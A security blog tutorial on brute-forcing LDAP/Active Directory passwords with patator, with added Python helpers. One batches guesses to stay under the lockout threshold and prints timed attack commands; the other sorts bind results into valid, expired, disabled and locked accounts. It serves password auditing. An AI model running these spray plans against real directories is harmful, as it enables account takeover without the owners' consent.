SBM Labs

Cyber Security Collaboration Project

Brute-Force LDAP accounts with Patator
18 Sep 2016

Even with a password policy in place, LDAP users can still pick dictionary passwords. Our aim is to test LDAP accounts for such weak passwords. We will use the tool patator for this; it is a Python script.

First of all we need to download patator.

Then we need to install ldap-utils.

$ sudo apt-get install ldap-utils

Finally, we need a list of LDAP accounts and a password list. To collect the LDAP accounts you can follow the guide Gathering information about Active Directory users. A password list can be downloaded from the Internet or generated yourself with the wordlist generator crunch.

Before you run patator, check the account lockout policy (the lockout threshold and the observation window after which the bad-password counter resets). Otherwise you may lock out LDAP accounts and disrupt business processes. If a threshold is set, try fewer passwords per account than the threshold in one run, wait out the observation window, and only then start the next batch.

Now we are ready. Let's start.

$ ./patator.py ldap_login host=[IP_ADDRESS] binddn='CN=FILE0,OU=[DN_PATH]' bindpw=FILE1 0=/mnt/data/pentest/patator-master/logins.txt 1=/mnt/data/pentest/patator-master/passwords.txt ssl=1 port=636

We use the ldap_login module. FILE0 is replaced with each line of logins.txt (the users' CNs) and FILE1 with each line of passwords.txt; patator tries every password against every user. With ssl=1 and port=636 the binds go over LDAPS, so the passwords are not sent in clear text.
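The lockout caveat above is easy to get wrong by hand, so here is an added example (not code from the original post or from patator) that batches the password list into lockout-safe rounds and renders the patator command line from the post for each round. It assumes you have read the domain's lockout threshold and observation window from the policy, that the bind DN has the shape CN=FILE0,<suffix>, and that the host, DN suffix and user names used in the demo are placeholders.

```python
"""Lockout-aware batching for the patator ldap_login run above.

Added example; this is not code from the original post or from patator.
Assumptions: you know the domain's lockout threshold and observation window
(e.g. from the Default Domain Policy) and you run patator once per round,
waiting out the observation window between rounds.
"""
import shlex
import tempfile
from pathlib import Path


def spray_rounds(passwords, lockout_threshold, safety_margin=1):
    """Split the password list into rounds of (threshold - safety_margin)
    passwords. Patator tries every password of a round against every user,
    so within one run no account sees more failed binds than that.
    A threshold of 0 means lockout is disabled and everything fits one round.
    The real user's own typos also count towards the threshold and are
    invisible to you, which is what safety_margin is for."""
    passwords = list(passwords)
    if lockout_threshold <= 0:
        return [passwords]
    per_round = lockout_threshold - safety_margin
    if per_round < 1:
        raise ValueError("no safe number of guesses per round under this policy")
    return [passwords[i:i + per_round] for i in range(0, len(passwords), per_round)]


def patator_command(host, dn_suffix, logins_file, passwords_file, port=636, ssl=True):
    """Render the command line from the post for one round; dn_suffix is the
    part of the bind DN after 'CN=FILE0,' (assumed shape of the DN)."""
    args = ["./patator.py", "ldap_login", f"host={host}",
            f"binddn=CN=FILE0,{dn_suffix}", "bindpw=FILE1",
            f"0={logins_file}", f"1={passwords_file}",
            f"ssl={1 if ssl else 0}", f"port={port}",
            "-x", "ignore:fgrep=52e"]          # hide wrong-password noise
    return shlex.join(args)


def plan_spray(users, passwords, lockout_threshold, observation_window,
               host, dn_suffix, workdir=None, safety_margin=1):
    """Write logins.txt plus one password file per round and return a list of
    (command, seconds_to_wait_afterwards). The wait equals the observation
    window, which AD measures from the last failed attempt, so the
    bad-password counters are back to zero before the next round starts."""
    workdir = Path(workdir or tempfile.mkdtemp(prefix="ldap-spray-"))
    logins = workdir / "logins.txt"
    logins.write_text("".join(f"{u}\n" for u in users))
    rounds = spray_rounds(passwords, lockout_threshold, safety_margin)
    plan = []
    for n, rnd in enumerate(rounds):
        pw_file = workdir / f"passwords_round{n}.txt"
        pw_file.write_text("".join(f"{p}\n" for p in rnd))
        wait = observation_window if n < len(rounds) - 1 else 0
        plan.append((patator_command(host, dn_suffix, logins, pw_file), wait))
    return plan


if __name__ == "__main__":
    # Constructed inputs: three users, five guesses, threshold 3 / window 30 min.
    for cmd, wait in plan_spray(["jsmith", "adm_jones", "svc_backup"],
                                ["Password1", "Summer2016", "Welcome1",
                                 "Autumn2016", "P@ssw0rd"],
                                lockout_threshold=3, observation_window=1800,
                                host="10.0.0.5",
                                dn_suffix="OU=Users,DC=corp,DC=example"):
        print(cmd)
        print(f"# then sleep {wait}s before the next round")
```

Run each printed command, sleep the printed number of seconds, then run the next one. The order inside a round does not matter: whichever way patator iterates the two files, an account can only fail as many times as there are passwords in the round.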

The patator output carries LDAP result codes; look at the code and mesg fields. Against Active Directory the interesting detail is the "data NNN" subcode inside the mesg of a code 49 (invalid credentials) result:

code  mesg       description
0     -          bind succeeded: the credentials are valid
32    -          LDAP_NO_SUCH_OBJECT: the bind DN does not exist
49    data 52e   AD_INVALID_CREDENTIALS: wrong password
49    data 532   PASSWORD_EXPIRED
49    data 533   ACCOUNT_DISABLED
49    data 773   USER_MUST_RESET_PASSWORD
49    data 775   ACCOUNT_LOCKED_OUT: stop the run, you are hitting the lockout policy

You can drop uninteresting results with the -x ignore:fgrep= option, for example -x ignore:fgrep=52e to hide every wrong-password response. What remains are the successful binds and the account-state errors (expired, disabled, must reset password), which deserve a closer look. Never filter out data 775: that is your signal to stop.
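Reading those codes off a long run by eye is error-prone, so here is an added example (not patator's own code) that parses patator-style result lines, maps the LDAP result code and the AD subcode to a verdict, and flags the run for abort as soon as a locked-out account (data 775) shows up. The sample lines are constructed to look like patator's result table (code / size / time | candidate | num | mesg behind the usual log prefix); that layout is an assumption about the tool's output format, and the user names and host are placeholders.

```python
"""Classify patator ldap_login results by LDAP result code and AD subcode.

Added example; not patator's own code. SAMPLE_OUTPUT is constructed to look
like patator's result table (code / size / time | candidate | num | mesg,
behind the usual log prefix); that layout is an assumption about the tool's
output format. The 'data NNN' subcodes are the AcceptSecurityContext error
values Active Directory returns inside a code-49 (invalidCredentials) message.
"""
import re

# AD subcodes carried in the mesg field of a code-49 result.
AD_SUBCODES = {
    "525": "user not found",
    "52e": "invalid credentials (wrong password)",
    "530": "not permitted to log on at this time",
    "531": "not permitted to log on at this workstation",
    "532": "password expired",
    "533": "account disabled",
    "701": "account expired",
    "773": "user must reset password",
    "775": "account locked out",
}

LOG_PREFIX_RE = re.compile(r"^\S+\s+patator\s+\S+\s+-\s+")
LINE_RE = re.compile(
    r"^(?P<code>\S+)\s+(?P<size>\d+)\s+(?P<time>[\d.]+)\s*\|\s*"
    r"(?P<candidate>.*?)\s*\|\s*(?P<num>\d+)\s*\|\s*(?P<mesg>.*)$")
DATA_RE = re.compile(r"\bdata (?P<sub>[0-9a-f]{3})\b")

# Constructed sample of a run (placeholder users; not real output).
SAMPLE_OUTPUT = """\
12:00:01 patator    INFO - code  size    time | candidate                 |   num | mesg
12:00:01 patator    INFO - -----------------------------------------------------------------------------
12:00:02 patator    INFO - 49    110    0.012 | jsmith:Password1          |     1 | 80090308: LdapErr: DSID-0C0903A9, comment: AcceptSecurityContext error, data 52e, v1db1
12:00:02 patator    INFO - 0     0      0.010 | jsmith:Summer2016         |     2 |
12:00:02 patator    INFO - 49    110    0.011 | svc_backup:Password1      |     3 | 80090308: LdapErr: DSID-0C0903A9, comment: AcceptSecurityContext error, data 533, v1db1
12:00:03 patator    INFO - 49    110    0.011 | adm_jones:Password1       |     4 | 80090308: LdapErr: DSID-0C0903A9, comment: AcceptSecurityContext error, data 775, v1db1
12:00:03 patator    INFO - 32    0      0.009 | ghost:Password1           |     5 |
"""


def parse_line(line):
    """Return a dict for one result row, or None for headers and other log lines."""
    line = LOG_PREFIX_RE.sub("", line.strip())
    m = LINE_RE.match(line)
    if not m:
        return None
    row = m.groupdict()
    user, _, password = row["candidate"].partition(":")
    sub = DATA_RE.search(row["mesg"])
    row.update(user=user, password=password, subcode=sub.group("sub") if sub else None)
    return row


def classify(row):
    """Map a parsed row to (verdict, description)."""
    if row["code"] == "0":
        return "valid", "bind succeeded"
    if row["code"] == "49":
        sub = row["subcode"]
        desc = AD_SUBCODES.get(sub, f"unknown subcode {sub}")
        if sub == "775":
            return "locked", desc
        if sub in ("525", "52e"):
            return "invalid", desc
        return "account-state", desc      # needs a human look, never filter it
    if row["code"] == "32":
        return "no-such-object", "bind DN does not exist"
    return "other", f"LDAP result code {row['code']}"


def summarize(lines):
    """Tally verdicts over a run; 'abort' is set as soon as any lockout is seen."""
    summary = {"valid": [], "account-state": [], "locked": [],
               "invalid": 0, "no-such-object": 0, "other": 0}
    for line in lines:
        row = parse_line(line)
        if row is None:
            continue
        verdict, desc = classify(row)
        if verdict in ("valid", "account-state", "locked"):
            summary[verdict].append((row["user"], row["password"], desc))
        else:
            summary[verdict] += 1
    summary["abort"] = bool(summary["locked"])
    return summary


if __name__ == "__main__":
    result = summarize(SAMPLE_OUTPUT.splitlines())
    for key, value in result.items():
        print(f"{key}: {value}")
```

Feed it the lines of a real run (for example by piping patator's output through tee into a file and calling summarize on that file's lines) and stop the run the moment abort is true; the account-state entries are the ones to follow up on by hand.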
